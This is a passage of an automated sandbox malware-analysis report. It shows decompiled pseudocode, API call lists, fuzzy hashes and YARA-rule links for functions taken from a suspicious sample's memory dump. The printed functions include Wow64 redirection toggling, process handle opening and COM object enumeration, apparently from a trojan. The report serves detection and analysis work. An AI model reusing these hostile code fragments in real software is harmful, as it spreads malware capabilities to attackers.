                                0x04811e1f
                                0x04811e68
                                0x04811e68
                                0x04811e7b
                                0x04811e85
                                0x04811e8d
                                0x04811e92
                                0x04811e9c
                                0x04811e9c
                                0x04811e94
                                0x04811e94
                                0x04811e94
                                0x04811e94
                                0x04811ebe
                                0x04811ec6
                                0x04811ef4
                                0x04811ef9
                                0x04811f00
                                0x04811f05
                                0x04811f09
                                0x04811f3b
                                0x04811f0b
                                0x04811f18
                                0x04811f1b
                                0x04811f2b
                                0x04811f2e
                                0x04811f34
                                0x04811f34
                                0x04811ec8
                                0x04811ed5
                                0x04811ed8
                                0x04811eea
                                0x04811eed
                                0x04811eed
                                0x04811f45
                                0x04811f51
                                0x04811f47
                                0x04811f4a
                                0x04811f4a
                                0x04811f45
                                0x04811ebe
                                0x00000000
                                0x04811e85
                                0x04811e2e
                                0x04811e31
                                0x04811e38
                                0x04811e3e
                                0x04811e41
                                0x04811e43
                                0x04811e4f
                                0x04811e52
                                0x04811e52
                                0x04811e58
                                0x04811e5d
                                0x04811e5d
                                0x04811e63
                                0x00000000
                                0x04811e63
                                0x04811d71
                                0x00000000
                                0x04811d98
                                0x04811d98
                                0x04811da4
                                0x04811db7
                                0x04811dbd
                                0x04811dc5
                                0x00000000
                                0x04811dc5

                                APIs
                                • StrChrA.SHLWAPI(048130C2,0000005F,00000000,00000000,00000104), ref: 04811D8A
                                • lstrcpy.KERNEL32(?,?), ref: 04811DB7
                                  • Part of subcall function 04814AA6: lstrlen.KERNEL32(?,00000000,068D9C98,74ECC740,048113D0,068D9E9D,048155DE,048155DE,?,048155DE,?,63699BC3,E8FA7DD7,00000000), ref: 04814AAD
                                  • Part of subcall function 04814AA6: mbstowcs.NTDLL ref: 04814AD6
                                  • Part of subcall function 04814AA6: memset.NTDLL ref: 04814AE8
                                  • Part of subcall function 04811F7A: lstrlenW.KERNEL32(?,?,?,04811F20,3D048190,80000002,048130C2,04814106,74666F53,4D4C4B48,04814106,?,3D048190,80000002,048130C2,?), ref: 04811F9F
                                  • Part of subcall function 048150CA: HeapFree.KERNEL32(00000000,00000000,04814239,00000000,00000001,?,00000000,?,?,?,04816B8D,00000000,?,00000001), ref: 048150D6
                                • lstrcpy.KERNEL32(?,00000000), ref: 04811DD9
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: 42803f854b603280733cce53e9bd26846fa95bdaac4a4abd0c2ed28d55eaf92e
                                • Instruction ID: 101436ac45113fe398f4f87a6f12d67277db6ce28f1c7c397b168785a76d7b6d
                                • Opcode Fuzzy Hash: 42803f854b603280733cce53e9bd26846fa95bdaac4a4abd0c2ed28d55eaf92e
                                • Instruction Fuzzy Hash: 5151487250020ABFDF219FA4EC44EAA7BBDEB48314F008E16FA15D2170E775E965DB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04816BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                Download Yara Rule
                                C-Code - Quality: 32%
                                			E04816BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E04812902(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x481a2d4; // 0x20bd5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x481b4c8; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x481b8f8; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x481a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}
















                                0x04816be1
                                0x04816be8
                                0x04816bec
                                0x04816bf1
                                0x04816bf8
                                0x04816bfb
                                0x04816c05
                                0x04816c0a
                                0x04816c16
                                0x04816c1d
                                0x04816c27
                                0x04816c27
                                0x04816c1f
                                0x04816c1f
                                0x04816c1f
                                0x04816c1f
                                0x04816c2d
                                0x04816c30
                                0x04816c38
                                0x04816c3b
                                0x04816c3e
                                0x04816c41
                                0x04816c46
                                0x04816c4f
                                0x04816c5c
                                0x04816c51
                                0x04816c57
                                0x04816c57
                                0x04816c62
                                0x04816c62
                                0x04816c6a

                                APIs
                                  • Part of subcall function 04812902: SysAllocString.OLEAUT32(?), ref: 0481295E
                                  • Part of subcall function 04812902: SysAllocString.OLEAUT32(0070006F), ref: 04812972
                                  • Part of subcall function 04812902: SysAllocString.OLEAUT32(00000000), ref: 04812984
                                  • Part of subcall function 04812902: SysFreeString.OLEAUT32(00000000), ref: 048129E8
                                • memset.NTDLL ref: 04816C05
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 04816C41
                                • GetLastError.KERNEL32 ref: 04816C51
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04816C62
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                • String ID: <
                                • API String ID: 593937197-4251816714
                                • Opcode ID: b9143613f529bba45c99b33f398ce2c4b43853af7e9d7db7c646750761c0a421
                                • Instruction ID: 2e1ca86fd67e9cffe7d7d1f0638c1e68580735f278e36cd452b23d9bfc35d8ff
                                • Opcode Fuzzy Hash: b9143613f529bba45c99b33f398ce2c4b43853af7e9d7db7c646750761c0a421
                                • Instruction Fuzzy Hash: 631100B1A00218AFDB00DF59D885BD97BBCEB08794F008917E909E7251E774E544CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048139C5, Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.NTDLL(04814A23,048170D9,00000010,?,?,?,04814A23,00000001,048170D9,00000000,?,048162B1,00000000,048170D9,?,00000000), ref: 04813A16
                                • memcpy.NTDLL(00000000,00000000,068D9630,00000010), ref: 04813AA9
                                • GetLastError.KERNEL32(?,?,00000010), ref: 04813B01
                                • GetLastError.KERNEL32 ref: 04813B33
                                • GetLastError.KERNEL32 ref: 04813B47
                                • GetLastError.KERNEL32(?,?,?,04814A23,00000001,048170D9,00000000,?,048162B1,00000000,048170D9,?,00000000,048170D9,00000000,068D9630), ref: 04813B5C
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLast$memcpy
                                • String ID:
                                • API String ID: 2760375183-0
                                • Opcode ID: 0a16b01abfc7397a338b7995a1819e90e22783d1de9e6a7cdc0c9d023353cb85
                                • Instruction ID: c150a8491b32d65019fadd4bada373e7ae812f60c6978dc6f613e7064e6bca30
                                • Opcode Fuzzy Hash: 0a16b01abfc7397a338b7995a1819e90e22783d1de9e6a7cdc0c9d023353cb85
                                • Instruction Fuzzy Hash: 8C514FB1900208FFEF10DFA5D884EAEBBBDEB04354F008926F905E6160E775AE54DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04812A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
                                			E04812A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04816837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E048150CA(_v16);
								goto L37;
							}
							_t103 = E04816837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x481a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                0x04812a2a
                                0x04812a31
                                0x04812a36
                                0x04812a39
                                0x04812a40
                                0x04812a43
                                0x04812a46
                                0x04812a4d
                                0x04812a50
                                0x04812ba4
                                0x04812ba6
                                0x04812ba8
                                0x04812bad
                                0x04812bad
                                0x04812a56
                                0x04812a59
                                0x04812a5c
                                0x04812a5e
                                0x04812a5e
                                0x04812a62
                                0x00000000
                                0x00000000
                                0x04812a66
                                0x04812a92
                                0x04812a97
                                0x04812a99
                                0x04812a99
                                0x04812a9c
                                0x04812a9f
                                0x04812a9f
                                0x04812aa1
                                0x00000000
                                0x04812a6c
                                0x04812a6e
                                0x04812a8d
                                0x04812a8d
                                0x04812aa4
                                0x04812aa4
                                0x04812aa5
                                0x04812aa5
                                0x04812aa8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04812aa8
                                0x04812a72
                                0x04812ab9
                                0x04812abd
                                0x04812b97
                                0x04812b99
                                0x04812b99
                                0x04812b9a
                                0x04812b9d
                                0x00000000
                                0x04812b9d
                                0x04812ad7
                                0x04812adb
                                0x04812b93
                                0x00000000
                                0x04812b93
                                0x04812ae1
                                0x04812ae4
                                0x04812ae8
                                0x04812aee
                                0x04812af1
                                0x04812b89
                                0x04812b89
                                0x00000000
                                0x04812b8f
                                0x04812afc
                                0x04812b05
                                0x04812b19
                                0x04812b20
                                0x04812b35
                                0x04812b3b
                                0x04812b43
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04812b45
                                0x04812b45
                                0x04812b45
                                0x04812b4c
                                0x04812b54
                                0x00000000
                                0x00000000
                                0x04812b56
                                0x04812b5f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04812b61
                                0x04812b63
                                0x04812b66
                                0x04812b66
                                0x04812b69
                                0x04812b6d
                                0x04812b70
                                0x04812b76
                                0x04812b79
                                0x04812b80
                                0x00000000
                                0x04812afc
                                0x04812a77
                                0x04812a82
                                0x04812a85
                                0x04812a87
                                0x04812a87
                                0x04812a8a
                                0x04812a8c
                                0x00000000
                                0x04812a8c
                                0x04812a66
                                0x04812aac
                                0x04812ab1
                                0x04812ab3
                                0x04812ab3
                                0x04812ab6
                                0x04812ab6
                                0x00000000

                                APIs
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • lstrcpy.KERNEL32(63699BC4,00000020), ref: 04812B20
                                • lstrcat.KERNEL32(63699BC4,00000020), ref: 04812B35
                                • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04812B4C
                                • lstrlen.KERNEL32(63699BC4), ref: 04812B70
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: a8f2207d0453f9f63239220413a9c8ce36fb4869f13dfc27964ba881bf50ddb7
                                • Instruction ID: 72996110c80b74775f47a97f8df9f64eda56e594c50efb9a4ed8ed198901294f
                                • Opcode Fuzzy Hash: a8f2207d0453f9f63239220413a9c8ce36fb4869f13dfc27964ba881bf50ddb7
                                • Instruction Fuzzy Hash: F651B471A00108EFDF25DF99C584AADBBBAFF45314F058997E815EB221C770BA81CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04814C1B, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04814C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x481a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x481a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x481a2b0 = _t6;
				 *0x481a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x481a2ac = _t7;
				if(_t7 == 0) {
					 *0x481a2ac =  *0x481a2ac | 0xffffffff;
				}
				return 0;
			}








                                0x04814c23
                                0x04814c2b
                                0x04814c30
                                0x00000000
                                0x04814c7d
                                0x04814c32
                                0x04814c3a
                                0x04814c7a
                                0x00000000
                                0x04814c7a
                                0x04814c3c
                                0x04814c41
                                0x04814c53
                                0x04814c58
                                0x04814c5e
                                0x04814c66
                                0x04814c6b
                                0x04814c6d
                                0x04814c6d
                                0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04816B4E,?,?,00000001), ref: 04814C23
                                • GetVersion.KERNEL32(?,00000001), ref: 04814C32
                                • GetCurrentProcessId.KERNEL32(?,00000001), ref: 04814C41
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 04814C5E
                                • GetLastError.KERNEL32(?,00000001), ref: 04814C7D
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 8b941a6de3ad5d7a90a023822a76434eeb25119499dfc8c2ee2a3a7b74863ffd
                                • Instruction ID: 0768999483528416099b3576534fddc9b03fa45a56bf6eb4e06421c72b8b98da
                                • Opcode Fuzzy Hash: 8b941a6de3ad5d7a90a023822a76434eeb25119499dfc8c2ee2a3a7b74863ffd
                                • Instruction Fuzzy Hash: F7F017B0B463019FD724AF65E819B253BACE704B41F104E1BE54AC61F0D77A9941CF25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0481161A, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 0481165B
                                • SysFreeString.OLEAUT32(00000000), ref: 0481173E
                                  • Part of subcall function 04816C6D: SysAllocString.OLEAUT32(048192B0), ref: 04816CBD
                                • SafeArrayDestroy.OLEAUT32(?), ref: 04811792
                                • SysFreeString.OLEAUT32(?), ref: 048117A0
                                  • Part of subcall function 04811FC2: Sleep.KERNEL32(000001F4), ref: 0481200A
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: ea9997439459595bcb8589ed3ad6d36204b065a3c0ec2127db4670269dfe6edc
                                • Instruction ID: 2897a0fdc36bcef84ad40e898def8fea52595df5b6ed142508b7069975fc3ee4
                                • Opcode Fuzzy Hash: ea9997439459595bcb8589ed3ad6d36204b065a3c0ec2127db4670269dfe6edc
                                • Instruction Fuzzy Hash: 73513375900249EFCB00DFE8C88889EB7BAFF88344B148D6AE605DB324D775AD45CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04816C6D, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E04816C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x481a2d4; // 0x20bd5a8
					_t5 = _t102 + 0x481b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x48192b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x481a2d4; // 0x20bd5a8
												_t28 = _t108 + 0x481b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x481a2d4; // 0x20bd5a8
														_t33 = _t78 + 0x481b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                0x04816c72
                                0x04816c7b
                                0x04816c7c
                                0x04816c80
                                0x04816c86
                                0x04816c8c
                                0x04816c95
                                0x04816c9b
                                0x04816ca5
                                0x04816ca7
                                0x04816cad
                                0x04816cb2
                                0x04816cbd
                                0x04816cc5
                                0x04816cc8
                                0x04816deb
                                0x04816cce
                                0x04816cce
                                0x04816cdb
                                0x04816ce1
                                0x04816ce7
                                0x04816ceb
                                0x04816cf1
                                0x04816cfe
                                0x04816d02
                                0x04816d08
                                0x04816d0b
                                0x04816d11
                                0x04816d17
                                0x04816d1d
                                0x04816d20
                                0x04816d23
                                0x04816d29
                                0x04816d32
                                0x04816d38
                                0x04816d39
                                0x04816d3c
                                0x04816d3d
                                0x04816d3e
                                0x04816d46
                                0x04816d47
                                0x04816d48
                                0x04816d4a
                                0x04816d4e
                                0x04816d52
                                0x00000000
                                0x00000000
                                0x04816d58
                                0x04816d61
                                0x04816d67
                                0x04816d71
                                0x04816d75
                                0x04816d77
                                0x04816d84
                                0x04816d88
                                0x04816d90
                                0x04816d95
                                0x04816da7
                                0x04816da9
                                0x04816daf
                                0x04816daf
                                0x04816db8
                                0x04816db8
                                0x04816dba
                                0x04816dc0
                                0x04816dc0
                                0x04816dc3
                                0x04816dc9
                                0x04816dcc
                                0x04816dd5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04816dd5
                                0x04816d29
                                0x04816d23
                                0x04816d0b
                                0x04816ddb
                                0x04816ddb
                                0x04816de1
                                0x04816de1
                                0x04816de7
                                0x04816de7
                                0x04816df0
                                0x04816df6
                                0x04816df6
                                0x04816cb2
                                0x04816dff

                                APIs
                                • SysAllocString.OLEAUT32(048192B0), ref: 04816CBD
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04816D9F
                                • SysFreeString.OLEAUT32(00000000), ref: 04816DB8
                                • SysFreeString.OLEAUT32(?), ref: 04816DE7
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 29e11316fc06f6e86e946a21cce9797582be0e0abdaa7d3e45c7d1c5184e1261
                                • Instruction ID: 58c8720fb21b51294cbdbf01dd572ab0b9eb385f6b5f65455a9d539b33dd4cd2
                                • Opcode Fuzzy Hash: 29e11316fc06f6e86e946a21cce9797582be0e0abdaa7d3e45c7d1c5184e1261
                                • Instruction Fuzzy Hash: 89512175D00519DFCB00DFA8C48889EB7B9FF89704F144A99E915EB325D776AD01CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04815D93, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E04815D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E048128F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04811000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04813915(_t101,  &_v428, _a8, _t96 - _t81);
					E04813915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04811000(_t101,  &E0481A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04811000(_a16, _a4);
						E04813B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04817D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04817D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E0481679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E04815AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04814A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E0481A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                0x04815d96
                                0x04815da2
